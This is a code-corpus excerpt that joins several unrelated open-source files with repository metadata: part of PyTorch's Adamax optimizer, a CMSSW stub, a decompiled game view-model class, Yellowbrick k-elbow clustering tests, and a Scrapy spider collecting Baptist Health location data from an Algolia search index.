lr=2e-3,
betas=(0.9, 0.999),
eps=1e-8,
weight_decay=0,
foreach: Optional[bool] = None,
*,
maximize: bool = False,
differentiable: bool = False,
):
if not 0.0 <= lr:
raise ValueError(f"Invalid learning rate: {lr}")
if not 0.0 <= eps:
raise ValueError(f"Invalid epsilon value: {eps}")
if not 0.0 <= betas[0] < 1.0:
raise ValueError(f"Invalid beta parameter at index 0: {betas[0]}")
if not 0.0 <= betas[1] < 1.0:
raise ValueError(f"Invalid beta parameter at index 1: {betas[1]}")
if not 0.0 <= weight_decay:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = dict(
lr=lr,
betas=betas,
eps=eps,
weight_decay=weight_decay,
foreach=foreach,
maximize=maximize,
differentiable=differentiable,
)
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("foreach", None)
group.setdefault("maximize", False)
group.setdefault("differentiable", False)
state_values = list(self.state.values())
step_is_tensor = (len(state_values) != 0) and torch.is_tensor(
state_values[0]["step"]
)
if not step_is_tensor:
for s in state_values:
s["step"] = torch.tensor(float(s["step"]))
def _init_group(self, group, params_with_grad, grads, exp_avgs, exp_infs, state_steps):
for p in group["params"]:
if p.grad is None:
continue
params_with_grad.append(p)
if p.grad.is_sparse:
raise RuntimeError("Adamax does not support sparse gradients")
grads.append(p.grad)
state = self.state[p]
# State initialization
if len(state) == 0:
state["step"] = torch.tensor(0.0)
state["exp_avg"] = torch.zeros_like(
p, memory_format=torch.preserve_format
)
state["exp_inf"] = torch.zeros_like(
p, memory_format=torch.preserve_format
)
exp_avgs.append(state["exp_avg"])
exp_infs.append(state["exp_inf"])
state_steps.append(state["step"])
@_use_grad_for_differentiable
def step(self, closure=None):
"""Performs a single optimization step.
Args:
closure (Callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
params_with_grad = []
grads = []
exp_avgs = []
exp_infs = []
state_steps = []
beta1, beta2 = group["betas"]
eps = group["eps"]
lr = group["lr"]
weight_decay = group["weight_decay"]
foreach = group["foreach"]
maximize = group["maximize"]
differentiable = group["differentiable"]
self._init_group(group, params_with_grad, grads, exp_avgs, exp_infs, state_steps)
adamax(
params_with_grad,
grads,
exp_avgs,
exp_infs,
state_steps,
eps=eps,
beta1=beta1,
beta2=beta2,
lr=lr,
weight_decay=weight_decay,
foreach=foreach,
maximize=maximize,
differentiable=differentiable,
)
return loss
Adamax.__doc__ = r"""Implements Adamax algorithm (a variant of Adam based on infinity norm).
.. math::
\begin{aligned}
&\rule{110mm}{0.4pt} \\
&\textbf{input} : \gamma \text{ (lr)}, \beta_1, \beta_2
\text{ (betas)},\theta_0 \text{ (params)},f(\theta) \text{ (objective)},
\: \lambda \text{ (weight decay)}, \\
&\hspace{13mm} \epsilon \text{ (epsilon)} \\
&\textbf{initialize} : m_0 \leftarrow 0 \text{ ( first moment)},
u_0 \leftarrow 0 \text{ ( infinity norm)} \\[-1.ex]
&\rule{110mm}{0.4pt} \\
&\textbf{for} \: t=1 \: \textbf{to} \: \ldots \: \textbf{do} \\
&\hspace{5mm}g_t \leftarrow \nabla_{\theta} f_t (\theta_{t-1}) \\
&\hspace{5mm}if \: \lambda \neq 0 \\
&\hspace{10mm} g_t \leftarrow g_t + \lambda \theta_{t-1} \\
&\hspace{5mm}m_t \leftarrow \beta_1 m_{t-1} + (1 - \beta_1) g_t \\
&\hspace{5mm}u_t \leftarrow \mathrm{max}(\beta_2 u_{t-1}, |g_{t}|+\epsilon) \\
&\hspace{5mm}\theta_t \leftarrow \theta_{t-1} - \frac{\gamma m_t}{(1-\beta^t_1) u_t} \\
&\rule{110mm}{0.4pt} \\[-1.ex]
&\bf{return} \: \theta_t \\[-1.ex]
&\rule{110mm}{0.4pt} \\[-1.ex]
\end{aligned}
For further details regarding the algorithm we refer to `Adam: A Method for Stochastic Optimization`_.
""" + fr"""
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 2e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
{_foreach_doc}
{_maximize_doc}
{_differentiable_doc}
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
"""
def adamax(
params: List[Tensor],
grads: List[Tensor],
exp_avgs: List[Tensor],
exp_infs: List[Tensor],
state_steps: List[Tensor],
# kwonly args with defaults are not supported by functions compiled with torchscript issue #70627
# setting this as kwarg for now as functional API is compiled by torch/distributed/optim
foreach: Optional[bool] = None,
maximize: bool = False,
differentiable: bool = False,
*,
eps: float,
beta1: float,
beta2: float,
lr: float,
weight_decay: float,
):
r"""Functional API that performs adamax algorithm computation.
See :class:`~torch.optim.Adamax` for details.
"""
if not all(isinstance(t, torch.Tensor) for t in state_steps):
raise RuntimeError(
"API has changed, `state_steps` argument must contain a list of singleton tensors"
)
if foreach is None:
_, foreach = _default_to_fused_or_foreach(params, differentiable, use_fused=False)
if foreach and torch.jit.is_scripting():
raise RuntimeError("torch.jit.script not supported with foreach optimizers")
if foreach and not torch.jit.is_scripting():
func = _multi_tensor_adamax
else:
func = _single_tensor_adamax
func(
params,
grads,
exp_avgs,
exp_infs,
state_steps,
eps=eps,
beta1=beta1,
beta2=beta2,
lr=lr,
weight_decay=weight_decay,
maximize=maximize,
differentiable=differentiable,
)
def _single_tensor_adamax(
params: List[Tensor],
grads: List[Tensor],
exp_avgs: List[Tensor],
exp_infs: List[Tensor],
state_steps: List[Tensor],
*,
eps: float,
beta1: float,
beta2: float,
lr: float,
weight_decay: float,
maximize: bool,
differentiable: bool,
):
for i, param in enumerate(params):
grad = grads[i]
grad = grad if not maximize else -grad
exp_avg = exp_avgs[i]
exp_inf = exp_infs[i]
step_t = state_steps[i]
# update step
step_t += 1
if weight_decay != 0:
grad = grad.add(param, alpha=weight_decay)
if torch.is_complex(param):
param = torch.view_as_real(param)
grad = torch.view_as_real(grad)
exp_avg = torch.view_as_real(exp_avg)
exp_inf = torch.view_as_real(exp_inf)
# Update biased first moment estimate.
exp_avg.lerp_(grad, 1 - beta1)
# Update the exponentially weighted infinity norm.
norm_buf = torch.cat(
[exp_inf.mul_(beta2).unsqueeze(0), grad.abs().add_(eps).unsqueeze_(0)], 0
)
if not differentiable:
torch.amax(norm_buf, 0, keepdim=False, out=exp_inf)
else:
exp_inf.copy_(torch.amax(norm_buf, 0, keepdim=False))
bias_correction = 1 - beta1 ** _get_value(step_t)
clr = lr / bias_correction
param.addcdiv_(exp_avg, exp_inf, value=-clr)
def _multi_tensor_adamax(
params: List[Tensor],
grads: List[Tensor],
exp_avgs: List[Tensor],
exp_infs: List[Tensor],
state_steps: List[Tensor],
*,
beta1: float,
beta2: float,
lr: float,
weight_decay: float,
eps: float,
maximize: bool,
differentiable: bool,
):
assert not differentiable, "_foreach ops don't support autograd"
if len(params) == 0:
return
grouped_tensors = Optimizer._group_tensors_by_device_and_dtype([params, grads, exp_avgs, exp_infs, state_steps])
for ((grouped_params, grouped_grads, grouped_exp_avgs, grouped_exp_infs, grouped_state_steps), _) in grouped_tensors.values():
if maximize:
grouped_grads = torch._foreach_neg(grouped_grads)
grouped_params = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_params]
grouped_grads = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_grads]
grouped_exp_avgs = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_exp_avgs]
grouped_exp_infs = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_exp_infs]
# Update steps
torch._foreach_add_(grouped_state_steps, 1)
if weight_decay != 0:
if maximize:
# Re-use the intermediate memory (device_grads) already allocated for maximize
torch._foreach_add_(grouped_grads, grouped_params, alpha=weight_decay)
else:
grouped_grads = torch._foreach_add(grouped_grads, grouped_params, alpha=weight_decay)
# Update biased first moment estimate.
torch._foreach_lerp_(grouped_exp_avgs, grouped_grads, 1 - beta1)
# Update the exponentially weighted infinity norm.
torch._foreach_mul_(grouped_exp_infs, beta2)
for exp_inf, grad in zip(grouped_exp_infs, grouped_grads):
norm_buf = torch.cat(
[exp_inf.unsqueeze(0), grad.abs().add_(eps).unsqueeze_(0)], 0
)
torch.max(norm_buf, 0, keepdim=False, out=(exp_inf, exp_inf.new().long()))
bias_corrections = [1 - beta1 ** _get_value(step) for step in grouped_state_steps]
clr = _stack_if_compiling([-1 * (lr / bias_correction) for bias_correction in bias_corrections])
torch._foreach_addcdiv_(grouped_params, grouped_exp_avgs, grouped_exp_infs, clr)
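# Hedged usage sketch (not part of the original module): a standard training-step
# pattern with the Adamax optimizer; the model, shapes and hyperparameters are
# illustrative only.
#
# import torch.nn as nn
# model = nn.Linear(10, 1)
# optimizer = torch.optim.Adamax(model.parameters(), lr=2e-3, betas=(0.9, 0.999))
# loss = model(torch.randn(4, 10)).pow(2).mean()
# optimizer.zero_grad()
# loss.backward()
# optimizer.step()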
|
d25a9a33a83b398ecca4ac52b6310ce0e0b699a8
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Configuration/Geometry/python/dependencies.py
|
7ed3e0a09b8f8b31b81db5a174b47af6cce32966
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 154
|
py
|
dependencies.py
|
# this file exists to enforce dependencies for the generate2026Geometry unit test
from Configuration.StandardSequences.GeometryConf import GeometryConf
|
9cc854ce13ea3cb1f08863d099752927b85336f8
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/impl/gen/view_models/views/lobby/battle_pass/battle_pass_off_season_view_model.py
|
ebbc686e3d4d14bad78a046f5873a33f5146e6fb
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,900
|
py
|
battle_pass_off_season_view_model.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/impl/gen/view_models/views/lobby/battle_pass/battle_pass_off_season_view_model.py
from frameworks.wulf import ViewModel
class BattlePassOffSeasonViewModel(ViewModel):
__slots__ = ()
LOSE_VOTE = 'loseVote'
WIN_VOTE = 'winVote'
NOT_VOTE = 'notVote'
def __init__(self, properties=12, commands=0):
super(BattlePassOffSeasonViewModel, self).__init__(properties=properties, commands=commands)
def getLevel(self):
return self._getNumber(0)
def setLevel(self, value):
self._setNumber(0, value)
def getHasBattlePass(self):
return self._getBool(1)
def setHasBattlePass(self, value):
self._setBool(1, value)
def getIsPostProgression(self):
return self._getBool(2)
def setIsPostProgression(self, value):
self._setBool(2, value)
def getIsPostProgressionCompleted(self):
return self._getBool(3)
def setIsPostProgressionCompleted(self, value):
self._setBool(3, value)
def getIsEnabled(self):
return self._getBool(4)
def setIsEnabled(self, value):
self._setBool(4, value)
def getLeftVehicle(self):
return self._getString(5)
def setLeftVehicle(self, value):
self._setString(5, value)
def getLeftPoints(self):
return self._getNumber(6)
def setLeftPoints(self, value):
self._setNumber(6, value)
def getRightVehicle(self):
return self._getString(7)
def setRightVehicle(self, value):
self._setString(7, value)
def getRightPoints(self):
return self._getNumber(8)
def setRightPoints(self, value):
self._setNumber(8, value)
def getSeasonName(self):
return self._getString(9)
def setSeasonName(self, value):
self._setString(9, value)
def getIsFailedService(self):
return self._getBool(10)
def setIsFailedService(self, value):
self._setBool(10, value)
def getVoteStatus(self):
return self._getString(11)
def setVoteStatus(self, value):
self._setString(11, value)
def _initialize(self):
super(BattlePassOffSeasonViewModel, self)._initialize()
self._addNumberProperty('level', 1)
self._addBoolProperty('hasBattlePass', False)
self._addBoolProperty('isPostProgression', False)
self._addBoolProperty('isPostProgressionCompleted', False)
self._addBoolProperty('isEnabled', True)
self._addStringProperty('leftVehicle', '')
self._addNumberProperty('leftPoints', 0)
self._addStringProperty('rightVehicle', '')
self._addNumberProperty('rightPoints', 0)
self._addStringProperty('seasonName', '')
self._addBoolProperty('isFailedService', False)
self._addStringProperty('voteStatus', 'notVote')
|
eefebb91d4ec9452c228eb6a9f52229e12e35ef0
|
88efd76316e4184d76a5e0585d95fe734233942c
|
/tests/test_cluster/test_elbow.py
|
ce3ad4ddeeac67d497fc6c34cfc8d5260a14688c
|
[
"Apache-2.0"
] |
permissive
|
DistrictDataLabs/yellowbrick
|
1ecd9f33e58f0d007569904401c204a6cdeb5661
|
f7a8e950bd31452ea2f5d402a1c5d519cd163fd5
|
refs/heads/develop
| 2023-08-03T12:25:26.511916
| 2023-07-05T18:14:28
| 2023-07-05T18:14:28
| 59,121,694
| 4,242
| 660
|
Apache-2.0
| 2023-07-15T17:50:31
| 2016-05-18T14:12:17
|
Python
|
UTF-8
|
Python
| false
| false
| 17,483
|
py
|
test_elbow.py
|
# tests.test_cluster.test_elbow
# Tests for the KElbowVisualizer
#
# Author: Benjamin Bengfort
# Created: Thu Mar 23 22:30:19 2017 -0400
#
# Copyright (C) 2017 The scikit-yb developers
# For license information, see LICENSE.txt
#
# ID: test_elbow.py [5a370c8] benjamin@bengfort.com $
"""
Tests for the KElbowVisualizer
"""
##########################################################################
## Imports
##########################################################################
import sys
import pytest
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import csc_matrix, csr_matrix
from numpy.testing import assert_array_almost_equal
from sklearn.datasets import make_blobs
from sklearn.cluster import KMeans, MiniBatchKMeans
from sklearn.feature_extraction.text import TfidfVectorizer
from tests.fixtures import Dataset
from tests.base import VisualTestCase
from yellowbrick.datasets import load_hobbies
from yellowbrick.cluster.elbow import distortion_score
from yellowbrick.cluster.elbow import KElbowVisualizer, kelbow_visualizer
from yellowbrick.exceptions import YellowbrickValueError, YellowbrickWarning
from tests.base import IS_WINDOWS_OR_CONDA
try:
import pandas as pd
except ImportError:
pd = None
##########################################################################
## Data
##########################################################################
@pytest.fixture(scope="class")
def clusters(request):
# TODO: replace with make_blobs
X = np.array(
[
[-0.40020753, -4.67055317, -0.27191127, -1.49156318],
[0.37143349, -4.89391622, -1.23893945, 0.48318165],
[8.625142, -1.2372284, 1.39301471, 4.3394457],
[7.65803596, -2.21017215, 1.99175714, 3.71004654],
[0.89319875, -5.37152317, 1.50313598, 1.95284886],
[2.68362166, -5.78810913, -0.41233406, 1.94638989],
[7.63541182, -1.99606076, 0.9241231, 4.53478238],
[9.04699415, -0.74540679, 0.98042851, 5.99569071],
[1.02552122, -5.73874278, -1.74804915, -0.07831216],
[7.18135665, -3.49473178, 1.14300963, 4.46065816],
[0.58812902, -4.66559815, -0.72831685, 1.40171779],
[1.48620862, -5.9963108, 0.19145963, -1.11369256],
[7.6625556, -1.21328083, 2.06361094, 6.2643551],
[9.45050727, -1.36536078, 1.31154384, 3.89103468],
[6.88203724, -1.62040255, 3.89961049, 2.12865388],
[5.60842705, -2.10693356, 1.93328514, 3.90825432],
[2.35150936, -6.62836131, -1.84278374, 0.51540886],
[1.17446451, -5.62506058, -2.18420699, 1.21385128],
]
)
y = np.array([0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0])
request.cls.clusters = Dataset(X, y)
##########################################################################
## K-Elbow Helpers Test Cases
##########################################################################
@pytest.mark.usefixtures("clusters")
class TestKElbowHelper(object):
"""
Helper functions for K-Elbow Visualizer
"""
def test_distortion_score(self):
"""
Test the distortion score metric function
"""
score = distortion_score(self.clusters.X, self.clusters.y)
assert score == pytest.approx(69.10006514142941)
@pytest.mark.parametrize("func", [csc_matrix, csr_matrix], ids=["csc", "csr"])
def test_distortion_score_sparse_matrix_input(self, func):
"""
Test the distortion score metric on a sparse array
"""
score = distortion_score(func(self.clusters.X), self.clusters.y)
assert score == pytest.approx(69.10006514142938)
@pytest.mark.skipif(pd is None, reason="pandas is required")
def test_distortion_score_pandas_input(self):
"""
Test the distortion score metric on pandas DataFrame and Series
"""
df = pd.DataFrame(self.clusters.X)
s = pd.Series(self.clusters.y)
score = distortion_score(df, s)
assert score == pytest.approx(69.10006514142941)
def test_distortion_score_empty_clusters(self):
"""
Ensure no ValueError is thrown when there are empty clusters #1185
"""
X = np.array([[1,2],[3,4],[5,6]])
valuea = distortion_score(X, np.array([1,3,3]))
valueb = distortion_score(X, np.array([0,1,1]))
assert valuea == valueb
##########################################################################
## KElbowVisualizer Test Cases
##########################################################################
@pytest.mark.usefixtures("clusters")
class TestKElbowVisualizer(VisualTestCase):
"""
K-Elbow Visualizer Tests
"""
@pytest.mark.xfail(reason="images not close due to timing lines")
@pytest.mark.filterwarnings("ignore:No 'knee'")
def test_integrated_kmeans_elbow(self):
"""
Test no exceptions for kmeans k-elbow visualizer on blobs dataset
"""
# NOTE #182: cannot use occupancy dataset because of memory usage
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
try:
_, ax = plt.subplots()
visualizer = KElbowVisualizer(KMeans(random_state=42), k=4, ax=ax)
visualizer.fit(X)
visualizer.finalize()
self.assert_images_similar(visualizer)
except Exception as e:
pytest.fail("error during k-elbow: {}".format(e))
@pytest.mark.xfail(reason="images not close due to timing lines")
@pytest.mark.filterwarnings("ignore:No 'knee'")
def test_integrated_mini_batch_kmeans_elbow(self):
"""
Test no exceptions for mini-batch kmeans k-elbow visualizer
"""
# NOTE #182: cannot use occupancy dataset because of memory usage
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
try:
_, ax = plt.subplots()
visualizer = KElbowVisualizer(MiniBatchKMeans(random_state=42), k=4, ax=ax)
visualizer.fit(X)
visualizer.finalize()
self.assert_images_similar(visualizer)
except Exception as e:
pytest.fail("error during k-elbow: {}".format(e))
@pytest.mark.skip(reason="takes over 20 seconds to run")
def test_topic_modeling_k_means(self):
"""
Test topic modeling k-means on the hobbies corpus
"""
corpus = load_hobbies()
tfidf = TfidfVectorizer()
docs = tfidf.fit_transform(corpus.data)
visualizer = KElbowVisualizer(KMeans(), k=(4, 8))
visualizer.fit(docs)
visualizer.finalize()
self.assert_images_similar(visualizer)
def test_invalid_k(self):
"""
Assert that invalid values of K raise exceptions
"""
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k=(1, 2, 3, "foo", 5)).fit(X)
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k="foo").fit(X)
def test_valid_k(self):
"""
Assert that valid values of K generate correct k_values_
"""
# if k is an int, k_values_ = range(2, k+1)
# if k is a tuple of 2 ints, k_values = range(k[0], k[1])
# if k is an iterable, k_values_ = list(k)
# Generate a blobs data set
X, y = make_blobs(
n_samples=1000, n_features=12, centers=6, shuffle=True, random_state=42
)
visualizer = KElbowVisualizer(KMeans(), k=8).fit(X)
assert visualizer.k_values_ == list(np.arange(2, 8 + 1))
visualizer = KElbowVisualizer(KMeans(), k=(4, 12)).fit(X)
assert visualizer.k_values_ == list(np.arange(4, 12))
visualizer = KElbowVisualizer(KMeans(), k=np.arange(10, 100, 10)).fit(X)
assert visualizer.k_values_ == list(np.arange(10, 100, 10))
visualizer = KElbowVisualizer(KMeans(), k=[10, 20, 30, 40, 50, 60, 70, 80, 90]).fit(X)
assert visualizer.k_values_ == list(np.arange(10, 100, 10))
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_distortion_metric(self):
"""
Test the distortion metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="distortion",
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
expected = np.array([69.100065, 54.081571, 43.146921, 34.978487])
assert len(visualizer.k_scores_) == 4
visualizer.finalize()
self.assert_images_similar(visualizer, tol=0.03)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_silhouette_metric(self):
"""
Test the silhouette metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="silhouette",
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
expected = np.array([0.691636, 0.456646, 0.255174, 0.239842])
assert len(visualizer.k_scores_) == 4
visualizer.finalize()
self.assert_images_similar(visualizer)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_calinski_harabasz_metric(self):
"""
Test the calinski-harabasz metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="calinski_harabasz",
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
assert len(visualizer.k_scores_) == 4
assert visualizer.elbow_value_ is None
expected = np.array([81.662726, 50.992378, 40.952179, 35.939494])
visualizer.finalize()
self.assert_images_similar(visualizer)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_distance_metric(self):
"""
Test the manhattan distance metric of the distortion metric of the k-elbow visualizer
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=5,
metric="distortion",
distance_metric='manhattan',
timings=False,
locate_elbow=False,
)
visualizer.fit(self.clusters.X)
assert len(visualizer.k_scores_) == 4
assert visualizer.elbow_value_ is None
expected = np.array([189.060129, 154.096223, 124.271208, 107.087566])
visualizer.finalize()
self.assert_images_similar(visualizer)
assert_array_almost_equal(visualizer.k_scores_, expected)
@pytest.mark.xfail(
IS_WINDOWS_OR_CONDA,
reason="computation of k_scores_ varies by 2.867 max absolute difference",
)
def test_locate_elbow(self):
"""
Test the addition of locate_elbow to an image
"""
X, y = make_blobs(
n_samples=1000, n_features=5, centers=3, shuffle=True, random_state=42
)
visualizer = KElbowVisualizer(
KMeans(random_state=0),
k=6,
metric="calinski_harabasz",
timings=False,
locate_elbow=True,
)
visualizer.fit(X)
assert len(visualizer.k_scores_) == 5
assert visualizer.elbow_value_ == 3
expected = np.array([4286.5, 12463.4, 8766.8, 6950.1, 5863.6])
visualizer.finalize()
self.assert_images_similar(visualizer, tol=0.5, windows_tol=2.2)
assert_array_almost_equal(visualizer.k_scores_, expected, decimal=1)
def test_no_knee(self):
"""
Assert that a warning is issued if there is no knee detected
"""
X, y = make_blobs(n_samples=1000, centers=3, n_features=12, random_state=12)
message = (
"No 'knee' or 'elbow point' detected "
"This could be due to bad clustering, no "
"actual clusters being formed etc."
)
with pytest.warns(YellowbrickWarning, match=message):
visualizer = KElbowVisualizer(
KMeans(random_state=12), k=(4, 12), locate_elbow=True
)
visualizer.fit(X)
def test_bad_metric(self):
"""
Assert KElbow raises an exception when a bad metric is supplied
"""
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k=5, metric="foo")
def test_bad_distance_metric(self):
"""
Assert KElbow raises an exception when a bad distance metric is supplied
"""
with pytest.raises(YellowbrickValueError):
KElbowVisualizer(KMeans(), k=5, distance_metric="foo")
@pytest.mark.xfail(
IS_WINDOWS_OR_CONDA,
reason="font rendering different in OS and/or Python; see #892",
)
def test_timings(self):
"""
Test the twinx double axes with k-elbow timings
"""
visualizer = KElbowVisualizer(
KMeans(random_state=0), k=5, timings=True, locate_elbow=False
)
visualizer.fit(self.clusters.X)
# Check that we kept track of time
assert len(visualizer.k_timers_) == 4
assert all([t > 0 for t in visualizer.k_timers_])
# Check that we plotted time on a twinx
assert hasattr(visualizer, "axes")
assert len(visualizer.axes) == 2
# delete the timings axes and
        # overwrite k_timers_, k_values_ for image similarity tests
visualizer.axes[1].remove()
visualizer.k_timers_ = [
0.01084589958190918,
0.011144161224365234,
0.017028093338012695,
0.010634183883666992,
]
visualizer.k_values_ = [2, 3, 4, 5]
# call draw again which is normally called in fit
visualizer.draw()
visualizer.finalize()
self.assert_images_similar(visualizer)
def test_sample_weights(self):
"""
Test that passing in sample weights correctly influences the clusterer's fit
"""
seed = 1234
# original data has 5 clusters
X, y = make_blobs(
n_samples=[5, 30, 30, 30, 30],
n_features=5,
random_state=seed,
shuffle=False,
)
visualizer = KElbowVisualizer(
KMeans(random_state=seed), k=(2, 12), timings=False
)
visualizer.fit(X)
assert visualizer.elbow_value_ == 5
# weights should push elbow down to 4
weights = np.concatenate([np.ones(5) * 0.0001, np.ones(120)])
visualizer.fit(X, sample_weight=weights)
assert visualizer.elbow_value_ == 4
@pytest.mark.xfail(reason="images not close due to timing lines")
def test_quick_method(self):
"""
Test the quick method producing a valid visualization
"""
X, y = make_blobs(
n_samples=1000, n_features=12, centers=8, shuffle=False, random_state=2
)
model = MiniBatchKMeans(3, random_state=43)
oz = kelbow_visualizer(model, X, show=False)
assert isinstance(oz, KElbowVisualizer)
self.assert_images_similar(oz)
def test_quick_method_params(self):
"""
Test the quick method correctly consumes the user-provided parameters
"""
X, y = make_blobs(centers=3)
custom_title = "My custom title"
model = KMeans(3, random_state=13)
oz = kelbow_visualizer(
model, X, sample_weight=np.ones(X.shape[0]), title=custom_title, show=False
)
assert oz.title == custom_title
@pytest.mark.xfail(sys.platform == "win32", reason="images not close on windows")
def test_set_colors_manually(self):
"""
        Test that the metric, timing, and vline colors of the k-elbow visualizer can be set manually
"""
oz = KElbowVisualizer(
KMeans(random_state=0), k=5,
)
oz.metric_color = "r"
oz.timing_color = "y"
oz.vline_color = "c"
# Create artificial "fit" data for testing purposes
oz.k_values_ = [1, 2, 3, 4, 5, 6, 7, 8]
oz.k_timers_ = [6.2, 8.3, 10.1, 15.8, 21.2, 27.9, 38.2, 44.9]
oz.k_scores_ = [.8, .7, .55, .48, .40, .38, .35, .30]
oz.elbow_value_ = 5
oz.elbow_score_ = 0.40
# Execute drawing
oz.draw()
oz.finalize()
self.assert_images_similar(oz, tol=3.2)
def test_get_params(self):
"""
Ensure the get params works for sklearn-compatibility
"""
oz = KElbowVisualizer(
KMeans(random_state=0), k=5,
)
params = oz.get_params()
assert len(params) > 0
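For orientation, a minimal KElbow usage sketch along the lines these tests exercise (the dataset, k range, and metric below are illustrative, not taken from the tests):

```python
# Illustrative sketch only; mirrors the API exercised by the tests above.
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
from yellowbrick.cluster import KElbowVisualizer

X, _ = make_blobs(n_samples=500, centers=4, n_features=6, random_state=0)
viz = KElbowVisualizer(KMeans(random_state=0), k=(2, 10), metric="distortion")
viz.fit(X)    # fits one clusterer per k and records the elbow scores
viz.show()    # renders the elbow curve, marking the detected elbow if any
```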
| repo: alltheplaces/alltheplaces | path: /locations/spiders/baptist_health_arkansas.py | license: CC0-1.0, MIT (permissive) | Python | UTF-8 | 2,021 bytes |
import scrapy
from scrapy.http import JsonRequest
from locations.items import Feature
from locations.spiders.vapestore_gb import clean_address
class BaptistHealthArkansasSpider(scrapy.Spider):
name = "bha"
item_attributes = {
"brand": "Baptist Health Foundation",
"brand_wikidata": "Q50379824",
}
allowed_domains = ["algolia.net", "baptist-health.com"]
def start_requests(self):
yield JsonRequest(
url="https://6eh1ib012d-dsn.algolia.net/1/indexes/*/queries?x-algolia-agent=Algolia%20for%20JavaScript%20(3.33.0)%3B%20Browser%20(lite)%3B%20instantsearch.js%20(3.6.0)%3B%20Vue%20(2.6.10)%3B%20Vue%20InstantSearch%20(2.3.0)%3B%20JS%20Helper%20(2.28.0)&x-algolia-application-id=6EH1IB012D&x-algolia-api-key=66eafc59867885378e0a81317ea35987",
data={
"requests": [
{
"indexName": "wp_posts_location",
"params": "query=&hitsPerPage=500&maxValuesPerFacet=150&page=0&facets=%5B%22city%22%2C%22facility_type%22%5D&tagFilters=",
}
]
},
callback=self.parse_stores,
)
def parse_stores(self, response):
for i in response.json()["results"]:
first_value = list(i.values())[0]
for j in first_value:
properties = {
"name": j["post_title"],
"ref": j["permalink"],
"website": j["permalink"],
"image": j["image"],
"street_address": clean_address([j["address_1"], j["address_2"]]),
"city": j["city"],
"state": j["state"],
"postcode": j["zip_code"],
"country": "US",
"phone": j["phone_number"],
"lat": float(j["_geoloc"]["lat"]),
"lon": float(j["_geoloc"]["lng"]),
}
yield Feature(**properties)
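For reference, a rough sketch of the Algolia response shape that parse_stores walks (all field values below are invented; only the nesting matters, and the top-level key name is an assumption since the spider simply takes the first value of each result):

```python
# Hypothetical response fragment; illustrates the nesting consumed by parse_stores.
example_response = {
    "results": [
        {
            "hits": [  # first value of the result dict, i.e. list(i.values())[0]
                {
                    "post_title": "Example Clinic",
                    "permalink": "https://www.baptist-health.com/location/example",
                    "image": "https://www.baptist-health.com/example.jpg",
                    "address_1": "1 Example Dr",
                    "address_2": "",
                    "city": "Little Rock",
                    "state": "AR",
                    "zip_code": "72205",
                    "phone_number": "(501) 555-0100",
                    "_geoloc": {"lat": 34.74, "lng": -92.33},
                }
            ]
        }
    ]
}
```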
| repo: envoyproxy/envoy | path: /tools/config_validation/validate_fragment.py | license: Apache-2.0, LicenseRef-scancode-unknown-license-reference (permissive) | Python | UTF-8 | 2,103 bytes |
